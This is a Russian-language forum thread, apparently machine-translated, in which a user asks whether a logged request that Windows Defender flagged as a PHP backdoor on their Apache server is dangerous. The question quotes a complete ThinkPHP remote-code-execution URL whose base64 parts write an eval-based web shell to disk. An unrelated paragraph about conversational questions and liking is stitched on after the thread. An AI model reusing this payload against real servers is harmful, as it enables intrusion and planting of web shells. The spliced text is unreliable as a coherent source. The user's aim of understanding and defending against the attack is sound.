Рейтинг:0

Apache 2.4.51 Защита URL-адресов

флаг id

Я использую Apache 2.4.51 с PHP 8.1.0 на ПК с Windows 10. Недавно я заметил некоторые записи в своем журнале и соответствующие предупреждения от Защитника Windows. Примером виновника, вызывающего предупреждение AV, является https://jacobsm.com/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen (base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); который выдает в ответ код 200 и предупреждение от Защитника Windows о Бэкдор:PHP/Remoteshell.B. Защитник также сообщает, что статус не удался и, возможно, он не был полностью устранен. Затронутый файл — это файл журнала Apache, поэтому он не может помещать его в карантин, поскольку он используется Apache. Я подозреваю, что он обеспокоен тем, что файл может быть интерпретирован процессором PHP (хотя это никогда не будет). Должен ли я беспокоиться?

флаг in
Да, ты должен. Либо ваш ПК с Windows напрямую подключен к Интернету, либо в вашей локальной сети бродит вредоносное ПО. Обе проблемы должны быть решены.
флаг id
Хорошо, я удалил PHP из стека и использую альтернативные методы, чтобы получить то, что я получил с PHP. Теперь я должен быть в безопасности, ведь работает только Apache 2.4.51?!?

Ответить или комментировать

Большинство людей не понимают, что склонность к познанию нового открывает путь к обучению и улучшает межличностные связи. В исследованиях Элисон, например, хотя люди могли точно вспомнить, сколько вопросов было задано в их разговорах, они не чувствовали интуитивно связи между вопросами и симпатиями. В четырех исследованиях, в которых участники сами участвовали в разговорах или читали стенограммы чужих разговоров, люди, как правило, не осознавали, что задаваемый вопрос повлияет — или повлиял — на уровень дружбы между собеседниками.